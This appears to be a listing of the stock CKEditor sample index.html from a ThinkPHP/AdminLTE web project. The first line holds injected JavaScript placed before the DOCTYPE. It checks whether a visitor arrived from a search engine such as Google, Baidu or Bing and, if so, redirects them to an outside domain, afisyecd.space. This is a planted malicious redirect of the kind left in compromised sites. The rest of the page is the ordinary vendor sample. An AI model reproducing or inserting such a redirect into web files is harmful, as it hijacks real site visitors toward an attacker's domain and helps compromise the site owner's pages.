d:\wwwroot\wuchunhua\thinkphp\public\adminlte\plugins\ckeditor\samples\index.html
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002:
<!--
003:
Copyright (c) 2003-2016, CKSource - Frederico Knabben. All rights reserved.
004:
For licensing, see LICENSE.md or http://ckeditor.com/license
005:
-->
006:
<html>
007:
<head>
008:
<meta charset="utf-8">
009:
<title>CKEditor Sample</title>
010:
<script src="../ckeditor.js"></script>
011:
<script src="js/sample.js"></script>
012:
<link rel="stylesheet" href="css/samples.css">
013:
<link rel="stylesheet" href="toolbarconfigurator/lib/codemirror/neo.css">
014:
</head>
015:
<body id="main">
016:
017:
<nav class="navigation-a">
018:
<div class="grid-container">
019:
<ul class="navigation-a-left grid-width-70">
020:
<li><a href="http://ckeditor.com">Project Homepage</a></li>
021:
<li><a href="http://dev.ckeditor.com/">I found a bug</a></li>
022:
<li><a href="http://github.com/ckeditor/ckeditor-dev" class="icon-pos-right icon-navigation-a-github">Fork CKEditor on GitHub</a></li>
023:
</ul>
024:
<ul class="navigation-a-right grid-width-30">
025:
<li><a href="http://ckeditor.com/blog-list">CKEditor Blog</a></li>
026:
</ul>
027:
</div>
028:
</nav>
029:
030:
<header class="header-a">
031:
<div class="grid-container">
032:
<h1 class="header-a-logo grid-width-30">
033:
<a href="index.html"><img src="img/logo.png" alt="CKEditor Sample"></a>
034:
</h1>
035:
036:
<nav class="navigation-b grid-width-70">
037:
<ul>
038:
<li><a href="index.html" class="button-a button-a-background">Start</a></li>
039:
<li><a href="toolbarconfigurator/index.html" class="button-a">Toolbar configurator <span class="balloon-a balloon-a-nw">Edit your toolbar now!</span></a></li>
040:
</ul>
041:
</nav>
042:
</div>
043:
</header>
044:
045:
<main>
046:
<div class="adjoined-top">
047:
<div class="grid-container">
048:
<div class="content grid-width-100">
049:
<h1>Congratulations!</h1>
050:
<p>
051:
If you can see CKEditor below, it means that the installation succeeded.
052:
You can now try out your new editor version, see its features, and when you are ready to move on, check some of the <a href="#sample-customize">most useful resources</a> recommended below.
053:
</p>
054:
</div>
055:
</div>
056:
</div>
057:
<div class="adjoined-bottom">
058:
<div class="grid-container">
059:
<div class="grid-width-100">
060:
<div id="editor">
061:
<h1>Hello world!</h1>
062:
<p>I'm an instance of <a href="http://ckeditor.com">CKEditor</a>.</p>
063:
</div>
064:
</div>
065:
</div>
066:
</div>
067:
068:
<div class="grid-container">
069:
<div class="content grid-width-100">
070:
<section id="sample-customize">
071:
<h2>Customize Your Editor</h2>
072:
<p>Modular build and <a href="http://docs.ckeditor.com/#!/guide/dev_configuration">numerous configuration options</a> give you nearly endless possibilities to customize CKEditor. Replace the content of your <code><a href="../config.js">config.js</a></code> file with the following code and refresh this page (<strong>remember to clear the browser cache</strong>)!</p>
073:
<pre class="cm-s-neo CodeMirror"><code><span style="padding-right: 0.1px;"><span class="cm-variable">CKEDITOR</span>.<span class="cm-property">editorConfig</span> <span class="cm-operator">=</span> <span class="cm-keyword">function</span>( <span class="cm-def">config</span> ) {</span>
074:
<span style="padding-right: 0.1px;"><span class="cm-tab"> </span><span class="cm-variable-2">config</span>.<span class="cm-property">language</span> <span class="cm-operator">=</span> <span class="cm-string">'es'</span>;</span>
075:
<span style="padding-right: 0.1px;"><span class="cm-tab"> </span><span class="cm-variable-2">config</span>.<span class="cm-property">uiColor</span> <span class="cm-operator">=</span> <span class="cm-string">'#F7B42C'</span>;</span>
076:
<span style="padding-right: 0.1px;"><span class="cm-tab"> </span><span class="cm-variable-2">config</span>.<span class="cm-property">height</span> <span class="cm-operator">=</span> <span class="cm-number">300</span>;</span>
077:
<span style="padding-right: 0.1px;"><span class="cm-tab"> </span><span class="cm-variable-2">config</span>.<span class="cm-property">toolbarCanCollapse</span> <span class="cm-operator">=</span> <span class="cm-atom">true</span>;</span>
078:
<span style="padding-right: 0.1px;">};</span></code></pre>
079:
</section>
080:
081:
<section>
082:
<h2>Toolbar Configuration</h2>
083:
<p>If you want to reorder toolbar buttons or remove some of them, check <a href="toolbarconfigurator/index.html">this handy tool</a>!</p>
084:
</section>
085:
086:
<section>
087:
<h2>More Samples!</h2>
088:
<p>Visit the <a href="http://sdk.ckeditor.com">CKEditor SDK</a> for a huge collection of samples showcasing editor features, with source code readily available to copy and use in your own implementation.</p>
089:
</section>
090:
091:
<section>
092:
<h2>Developer's Guide</h2>
093:
<p>The most important resource for all developers working with CKEditor, integrating it with their websites and applications, and customizing to their needs. You can start from here:</p>
094:
<ul>
095:
<li><a href="http://docs.ckeditor.com/#!/guide/dev_installation">Getting Started</a> – Explains most crucial editor concepts and practices as well as the installation process and integration with your website.</li>
096:
<li><a href="http://docs.ckeditor.com/#!/guide/dev_advanced_installation">Advanced Installation Concepts</a> – Describes how to upgrade, install additional components (plugins, skins), or create a custom build.</li>
097:
</ul>
098:
<p>When you have the basics sorted out, feel free to browse some more advanced sections like:</p>
099:
<ul>
100:
<li><a href="http://docs.ckeditor.com/#!/guide/dev_features">Functionality Overview</a> – Descriptions and samples of various editor features.</li>
101:
<li><a href="http://docs.ckeditor.com/#!/guide/plugin_sdk_intro">Plugin SDK</a>, <a href="http://docs.ckeditor.com/#!/guide/widget_sdk_intro">Widget SDK</a>, and <a href="http://docs.ckeditor.com/#!/guide/skin_sdk_intro">Skin SDK</a> – Useful when you want to create your own editor components.</li>
102:
</ul>
103:
</section>
104:
105:
<section>
106:
<h2>CKEditor JavaScript API</h2>
107:
<p>CKEditor boasts a rich <a href="http://docs.ckeditor.com/#!/api">JavaScript API</a> that you can use to adjust the editor to your needs and integrate it with your website or application.</p>
108:
</section>
109:
</div>
110:
</div>
111:
</main>
112:
113:
<footer class="footer-a grid-container">
114:
<div class="grid-container">
115:
<p class="grid-width-100">
116:
CKEditor – The text editor for the Internet – <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
117:
</p>
118:
<p class="grid-width-100" id="copy">
119:
Copyright © 2003-2016, <a class="samples" href="http://cksource.com/">CKSource</a> – Frederico Knabben. All rights reserved.
120:
</p>
121:
</div>
122:
</footer>
123:
<script>
124:
initSample();
125:
</script>
126:
127:
</body>
128:
</html>
129:
130:
131: